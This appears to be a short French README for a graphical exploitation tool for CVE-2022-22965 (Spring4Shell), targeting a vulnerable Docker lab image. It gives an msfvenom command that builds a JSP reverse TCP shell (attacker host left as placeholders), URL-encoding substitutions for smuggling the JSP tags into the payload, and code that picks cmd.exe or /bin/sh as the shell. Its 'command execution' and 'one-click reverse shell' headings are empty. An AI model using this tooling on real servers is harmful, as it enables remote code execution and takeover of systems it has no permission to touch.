
Outil de détection graphique pour CVE-2022-22965 (Spring4Shell) avec génération de shell inversé en un clic, exécution de commandes et adaptation du chemin de shell multi-serveurs.
Cible
docker run -itd -p 80:8080 vulfocus/spring-core-rce-2022-03-29:latest
Le principe du reverse shell est basé sur msfvenom
msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx LPORT=xxx -f raw -o shell.jsp
Après avoir encodé le jsp en URL, utiliser
%3C%25 remplacer %25%7Bc2%7Di représente <%
%25%3E remplacer %25%7Bsuffix%7Di représente %>
Dans le code, le shellpath est modifié selon le type de serveur :
if self.radioButton_win.isChecked():
shellpath = "cmd.exe"
if self.radioButton_linux.isChecked():
shellpath = "/bin/sh"
Exécution de commande :
Détection whoami :
Reverse shell en un clic
